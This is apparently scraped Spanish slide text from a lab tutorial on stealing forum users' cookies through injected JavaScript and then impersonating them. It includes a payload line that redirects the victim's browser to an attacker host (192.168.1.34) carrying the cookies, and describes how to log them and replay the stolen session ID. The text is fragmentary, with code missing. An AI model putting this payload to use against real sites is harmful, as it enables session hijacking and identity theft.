Documentos de Académico
Documentos de Profesional
Documentos de Cultura
SUPLANTACIÓN DE
IDENTIDAD
ROBO DE COOKIES
CÓDIGO SERVIDOR
CÓDIGO ATACANTE
¿CÓMO CONSIGUE EL ATACANTE ENVIAR
EL PARÁMETRO URL CON LA COOKIE?
SUPLANTACIÓN DE
IDENTIDAD
ROBO DE COOKIES
SUPLANTACIÓN DE IDENTIDAD
CÓDIGO SERVIDOR
El atacante por otro lado tiene una página PHP en su sitio 192.168.1.34/ejer
página con el nombre cookies.php que contiene este código:
CÓDIGO ATACANTE
El atacante tiene un archivo de texto que se llama cookies.txt donde va a guardar las
cookies robadas. Intentará enviar las cookies desde el navegador del usuario a través de
un parámetro URL llamado cookies-robadas, por lo que consultará si hay algo en el GET.
Si es así lo graba en el archivo. Luego vuelve a redirigir al usuario a la página del foro del
"sitio bueno".
document.location = "http://192.168.1.34/ejer/cookies.php?cookies-robadas=" +
Enviamos el mensaje:
Cuando uno o varios usuarios en el "sitio bueno" pulsen el botón para enviar su mensaje,
entonces éste llegará al localhost de la máquina virtual (servidor) y se guardará con el resto
de mensajes del foro.
Este script hace una redirección al localhost del atacante portando como parámetro URL
todas las cookies del navegador del usuario que tenga almacenadas de la máquina
virtual donde está navegando.
Luego ya en el sitio del atacante queda guardar esas cookies y redirigir a la máquina
virtual sin que el usuario note el proceso. Consiguiendo las ansiadas Cookies.
http://livehttpheaders.mozdev.org/
Una opción en la ventana de cabeceras en tiempo real que permite repetir una solicitud
al servidor web, editando las cabeceras del HTTP para cambiarlas tal como nos A
nosotros nos interesa cambiarla claro que sí, con la COOKIE que hemos ROBADO.
Antes nos hemos metido en la página como atacante y nos reconoce como usuario
diciéndonos que nos hemos metido ya en esta página y la hora a la que ha sido.
Antes de la modificación vemos que la información del atacante mostraba era que nos
hemos metido desde el ordenador del atacante el 20 de noviembre de 2011 a las 19:16:10
esa información la lleva la cookie no olvidemos que es un archivo con información (en este
caso la información que tiene del usuario es la hora pero podría ser una contraseña, el
método es el mismo)
Lo que hacemos entonces es insertar el valor de la cookie que hemos robado copiamos el
valor de la cookie el SID en casos en los que este encriptado completamente pues no
deja de ser un valor, pero que nosotros no lo interpretamos fácilmente y es entendible
por el navegador.